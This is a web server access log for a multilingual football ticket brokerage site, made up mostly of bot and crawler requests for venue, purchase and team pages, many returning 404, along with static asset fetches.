47.128.122.135 - - [29/Jun/2024:00:49:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
37.187.94.3 - - [29/Jun/2024:00:49:32 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=7E85D833-C612-F222-4B5D-918B18070F54&sortorder=desc&column=row HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:49:32 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=EEC9C18B-9209-5406-9714-41066401B581 HTTP/1.1" 404 -
114.119.132.248 - - [29/Jun/2024:00:49:34 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=A867B156-AF3A-BCEC-F95E-12EB5F71CC5C HTTP/1.1" 200 85193
188.165.212.137 - - [29/Jun/2024:00:49:35 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/ligue_1/ HTTP/1.1" 404 -
52.167.144.19 - - [29/Jun/2024:00:49:36 +0200] "GET /ticket2/opencms/en/buy?page=1&edid=DD14CC82-883B-BD06-4306-EBD494AA1804 HTTP/1.1" 200 111379
188.165.241.181 - - [29/Jun/2024:00:49:38 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=EEE1683D-7711-CA74-6939-E0BA59258A12 HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:49:40 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=7E9AB165-1BAA-5369-C1B0-32A4E5979FAC&sortorder=asc&column=section HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:49:43 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:49:45 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=EF08F761-6D3A-2C5E-CAD2-0E2506BB1071 HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:49:47 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=7E9AB165-1BAA-5369-C1B0-32A4E5979FAC&sortorder=desc&column=row HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:49:52 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=EF31A462-4388-0119-B57C-552F86F22FFC HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:49:53 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/arsenal/ HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:49:54 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=7EB7BD2E-35BC-AFEE-4299-6D56D0CD8BF2 HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:50:00 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=EF3DDBD0-8AD7-39F7-94D9-5BDDBB2A78DA HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:50:01 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=7EC60143-B2D7-5A98-9FC2-8F446D229A88&sortorder=asc&column=row HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:50:03 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/aston_villa/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:50:06 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=EF46960E-40F0-93E3-4C59-3165FC2C860D HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:50:10 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=7F28348B-69FB-2132-341A-600FD197AF0A HTTP/1.1" 404 -
47.128.45.191 - - [29/Jun/2024:00:50:11 +0200] "GET /ticket2/opencms/nl/buy/?edid=6F379414-70C4-400F-51D2-AFD37C8F2BC7 HTTP/1.1" 200 71077
47.128.45.191 - - [29/Jun/2024:00:50:12 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
188.165.212.137 - - [29/Jun/2024:00:50:12 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/bournemouth/ HTTP/1.1" 404 -
47.128.45.191 - - [29/Jun/2024:00:50:12 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
188.165.241.181 - - [29/Jun/2024:00:50:12 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=EF6FD3C5-92B8-0848-2522-37DD22A0F2CC HTTP/1.1" 404 -
47.128.45.191 - - [29/Jun/2024:00:50:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.45.191 - - [29/Jun/2024:00:50:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.45.191 - - [29/Jun/2024:00:50:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.45.191 - - [29/Jun/2024:00:50:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.45.191 - - [29/Jun/2024:00:50:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
185.191.171.8 - - [29/Jun/2024:00:50:14 +0200] "GET /ticket2/opencms/en/search.html?searchQuery=liverpool&submit HTTP/1.1" 200 111971
37.187.94.3 - - [29/Jun/2024:00:50:18 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=7F28348B-69FB-2132-341A-600FD197AF0A&sortorder=desc&column=section HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:50:19 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=EF9A381D-E146-D5CF-CC6A-B0B8DD77CAB7 HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:50:20 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/brentford/ HTTP/1.1" 404 -
45.128.232.200 - - [29/Jun/2024:00:50:20 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 -
47.128.121.86 - - [29/Jun/2024:00:50:24 +0200] "GET /ticket2/opencms/fi/venue/?venueid=9106BE2A-595F-088E-C676-3C2DCBD74D16 HTTP/1.1" 200 73010
37.187.94.3 - - [29/Jun/2024:00:50:24 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=7F2CBB33-5DE0-D732-C63C-7C4192DA3A0E&sortorder=asc&column=price HTTP/1.1" 404 -
47.128.121.86 - - [29/Jun/2024:00:50:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.121.86 - - [29/Jun/2024:00:50:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
188.165.241.181 - - [29/Jun/2024:00:50:25 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=EFA6E1D1-4242-14C9-92E7-0490DFFC81B7 HTTP/1.1" 404 -
47.128.121.86 - - [29/Jun/2024:00:50:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.121.86 - - [29/Jun/2024:00:50:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.121.86 - - [29/Jun/2024:00:50:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.121.86 - - [29/Jun/2024:00:50:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.121.86 - - [29/Jun/2024:00:50:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
188.165.212.137 - - [29/Jun/2024:00:50:26 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/brighton/ HTTP/1.1" 404 -
85.208.96.212 - - [29/Jun/2024:00:50:28 +0200] "GET /ticket2/opencms/de/sport/fussball-tickets/premier_league/liverpool/ HTTP/1.1" 200 85606
47.128.121.86 - - [29/Jun/2024:00:50:30 +0200] "GET /ticket2/opencms/venue/luton.png HTTP/1.1" 200 396048
37.187.94.3 - - [29/Jun/2024:00:50:31 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=7F2CBB33-5DE0-D732-C63C-7C4192DA3A0E&sortorder=asc&column=row HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:50:32 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=EFAE3AB1-91B2-5DD3-E2E2-A440AD33BE5C HTTP/1.1" 404 -
17.241.219.85 - - [29/Jun/2024:00:50:34 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/uefa-champions-league/final/ HTTP/1.1" 200 73407
188.165.212.137 - - [29/Jun/2024:00:50:35 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/burnley/ HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:50:37 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=7F3E99B9-F971-F458-62C7-3FE184FDC47B&sortorder=asc&column=row HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:50:39 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=F01492AB-E24E-0642-65F1-7BCAAE719FAD HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:50:41 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/chelsea/ HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:50:43 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=7F3E99B9-F971-F458-62C7-3FE184FDC47B&sortorder=asc&column=section HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:50:46 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=F02E173E-B6D1-5F01-3792-4FB1E4AC7E1E HTTP/1.1" 404 -
51.222.253.3 - - [29/Jun/2024:00:50:47 +0200] "GET /ticket2/opencms/en/about/press/ HTTP/1.1" 200 71926
188.165.212.137 - - [29/Jun/2024:00:50:49 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/crystal_palace/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:50:53 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=F03C5E97-FFBF-7048-55FD-77B5E4C1E006 HTTP/1.1" 404 -
216.245.221.83 - - [29/Jun/2024:00:50:56 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
188.165.212.137 - - [29/Jun/2024:00:50:59 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/everton/ HTTP/1.1" 404 -
216.245.221.83 - - [29/Jun/2024:00:50:59 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
188.165.241.181 - - [29/Jun/2024:00:50:59 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=F046937B-FFC0-00AC-D134-B33C39D677F6 HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:51:00 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=7F5F87A7-7340-08DB-1A5F-4E64E20107F6&sortorder=asc&column=section HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:51:06 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/fulham/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:51:07 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=F07570AB-6180-6ECF-7A44-E3C64FEDE92E HTTP/1.1" 404 -
185.191.171.18 - - [29/Jun/2024:00:51:07 +0200] "GET /ticket2/opencms/de/magazine/article?title=manchester-united HTTP/1.1" 200 76451
188.165.212.137 - - [29/Jun/2024:00:51:13 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/liverpool/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:51:14 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=F0E9F0F3-AE69-E180-6663-501508165B7A HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:51:18 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=7FC2BA4A-B0EC-4788-E7A6-5EF2C3316160 HTTP/1.1" 404 -
47.128.121.89 - - [29/Jun/2024:00:51:21 +0200] "GET /ticket2/opencms/fi/venue/?countryid=F73B31CF-DEFB-FC53-7E40-B21973CC0497 HTTP/1.1" 200 102292
47.128.121.89 - - [29/Jun/2024:00:51:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.121.89 - - [29/Jun/2024:00:51:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
66.249.75.168 - - [29/Jun/2024:00:51:22 +0200] "GET /ticket2/opencms/fi/urheilu/jalkapallo/bundesliga/ HTTP/1.1" 200 80661
47.128.121.89 - - [29/Jun/2024:00:51:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.121.89 - - [29/Jun/2024:00:51:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
66.249.75.105 - - [29/Jun/2024:00:51:23 +0200] "GET /ticket2/opencms/en/venue/?venueid=AB927E22-66D3-728A-AD7D-149130013681 HTTP/1.1" 200 71405
47.128.121.89 - - [29/Jun/2024:00:51:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.121.89 - - [29/Jun/2024:00:51:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.121.89 - - [29/Jun/2024:00:51:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
188.165.212.137 - - [29/Jun/2024:00:51:24 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/luton/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:51:26 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=F1836AAE-08A8-903F-113A-E4F97A9329CF HTTP/1.1" 404 -
40.77.167.121 - - [29/Jun/2024:00:51:26 +0200] "GET /ticket2/opencms/dk/buy/?page=1&edid=07676057-0B4C-F0BB-865A-B1FCE6895C34 HTTP/1.1" 200 88364
188.165.212.137 - - [29/Jun/2024:00:51:31 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/manchester_city/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:51:32 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=F2980A6F-B64F-4B0C-6D38-4E1B59B5AA8D HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:51:37 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/manchester_united/ HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:51:37 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=7FC2BA4A-B0EC-4788-E7A6-5EF2C3316160&sortorder=desc&column=price HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:51:39 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=F2BA6C13-5265-3692-0B46-6A113BAF55BC HTTP/1.1" 404 -
185.191.171.17 - - [29/Jun/2024:00:51:39 +0200] "GET /ticket2/opencms/dk/sport/fodboldbilletter/premier-league/ipswich/ HTTP/1.1" 200 84668
188.165.212.137 - - [29/Jun/2024:00:51:44 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/newcastle_united/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:51:46 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=F2E24D37-66BC-8474-A9EE-AC205BD92A4D HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:51:50 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=7FEF013D-2963-1979-E960-CA6B866BF0D1&sortorder=desc&column=section HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:51:51 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/nottingham/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:51:53 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=F3839010-FA04-80EF-00C0-301AFB1437AD HTTP/1.1" 404 -
95.163.255.165 - - [29/Jun/2024:00:51:55 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.0" 200 773
188.165.212.137 - - [29/Jun/2024:00:51:58 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/sheffield/ HTTP/1.1" 404 -
95.163.255.162 - - [29/Jun/2024:00:51:59 +0200] "GET /ticket2/opencms/ru/sport/football/la_liga/barcelona/ HTTP/1.1" 500 -
188.165.241.181 - - [29/Jun/2024:00:52:00 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=F3A5C9EC-4CEF-B563-FECD-1A9EEC18334F HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:52:05 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/tottenham/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:52:07 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=F42AFEE1-85C5-55E9-807A-662212AA85FC HTTP/1.1" 404 -
185.191.171.11 - - [29/Jun/2024:00:52:10 +0200] "GET /ticket2/opencms/de/magazine/article?title=erling-braut-haaland HTTP/1.1" 200 75502
37.187.94.3 - - [29/Jun/2024:00:52:12 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=7FF5EB18-5CD4-97E7-2DB8-CB1FE9008083&sortorder=desc&column=price HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:52:14 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=F4FE8A93-D3AE-B0FC-0EBF-CDEF79158B44 HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:52:15 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/west_ham_united/ HTTP/1.1" 404 -
47.128.122.108 - - [29/Jun/2024:00:52:16 +0200] "GET /ticket2/opencms/fi/venue/?venueid=E6D4C5C5-380D-4772-E0D1-58201DC9D2A9 HTTP/1.1" 200 72924
47.128.122.108 - - [29/Jun/2024:00:52:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.122.108 - - [29/Jun/2024:00:52:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.122.108 - - [29/Jun/2024:00:52:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.122.108 - - [29/Jun/2024:00:52:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.122.108 - - [29/Jun/2024:00:52:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.122.108 - - [29/Jun/2024:00:52:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.122.108 - - [29/Jun/2024:00:52:20 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
188.165.241.181 - - [29/Jun/2024:00:52:21 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=F547B08D-C839-63CC-DDB8-9139B0448DEC HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:52:22 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/premier_league/wolverhampton/ HTTP/1.1" 404 -
17.22.245.205 - - [29/Jun/2024:00:52:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
17.22.237.238 - - [29/Jun/2024:00:52:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 71935
17.22.245.214 - - [29/Jun/2024:00:52:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
17.22.253.80 - - [29/Jun/2024:00:52:24 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583
17.22.245.45 - - [29/Jun/2024:00:52:24 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
17.22.245.205 - - [29/Jun/2024:00:52:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
17.22.245.161 - - [29/Jun/2024:00:52:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338
17.22.237.238 - - [29/Jun/2024:00:52:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
47.128.116.142 - - [29/Jun/2024:00:52:28 +0200] "GET /ticket2/opencms/nl/buy/?edid=10597F35-2AC7-31D2-FB61-15A36BB6D73B HTTP/1.1" 200 71077
37.187.94.3 - - [29/Jun/2024:00:52:28 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=7FF5EB18-5CD4-97E7-2DB8-CB1FE9008083&sortorder=desc&column=row HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:52:29 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/ HTTP/1.1" 404 -
47.128.116.142 - - [29/Jun/2024:00:52:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
185.191.171.2 - - [29/Jun/2024:00:52:29 +0200] "GET /ticket2/opencms/sv/magazine/article?title=om-tottenham-hotspur-stadium HTTP/1.1" 200 81554
47.128.116.142 - - [29/Jun/2024:00:52:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
51.222.253.8 - - [29/Jun/2024:00:52:29 +0200] "GET /ticket2/opencms/sv/magazine/article?title=arsenal-och-tottenham-delar-i-en-episk-4-4-match-den-29-oktober-2008 HTTP/1.1" 200 75741
47.128.116.142 - - [29/Jun/2024:00:52:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.116.142 - - [29/Jun/2024:00:52:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.116.142 - - [29/Jun/2024:00:52:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.116.142 - - [29/Jun/2024:00:52:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.116.142 - - [29/Jun/2024:00:52:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
188.165.241.181 - - [29/Jun/2024:00:52:35 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=F559DC88-543C-9BE7-D4C6-F477D1C58CD9 HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:52:36 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/atalanta/ HTTP/1.1" 404 -
216.245.221.83 - - [29/Jun/2024:00:52:39 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [29/Jun/2024:00:52:39 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
188.165.212.137 - - [29/Jun/2024:00:52:41 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/bologna/ HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:52:47 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=7FF5EB18-5CD4-97E7-2DB8-CB1FE9008083&sortorder=desc&column=section HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:52:48 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/cagliari/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:52:51 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=F63D0B85-674B-34FA-027D-C916C9DB7863 HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:52:55 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/empoli/ HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:53:04 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/fiorentina/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:53:06 +0200] "GET /ticket2/opencms/de/en/venue/?venueid=FF8D2B77-C235-F0A7-6D99-CAC26AC9D392 HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:53:09 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/frosinone/ HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:53:11 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=801CF113-A3FC-13DC-B3AC-DEF94DA97078&sortorder=desc&column=price HTTP/1.1" 404 -
47.128.43.188 - - [29/Jun/2024:00:53:12 +0200] "GET /ticket2/opencms/no/buy/?catid=8C381435-A1E8-94AF-2C58-D133FCA44A31&comcatid=66708183-7480-3365-06BF-DBF60280AB45&page=6 HTTP/1.1" 200 74552
47.128.43.188 - - [29/Jun/2024:00:53:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.43.188 - - [29/Jun/2024:00:53:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.43.188 - - [29/Jun/2024:00:53:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.43.188 - - [29/Jun/2024:00:53:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.43.188 - - [29/Jun/2024:00:53:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.43.188 - - [29/Jun/2024:00:53:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.43.188 - - [29/Jun/2024:00:53:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
188.165.212.137 - - [29/Jun/2024:00:53:16 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/genoa/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:53:17 +0200] "GET /ticket2/opencms/de/fi/buy/?page=10&eventid=C7B8839D-D05D-58E7-D08F-88E8ADCFDD77 HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:53:22 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/inter/ HTTP/1.1" 404 -
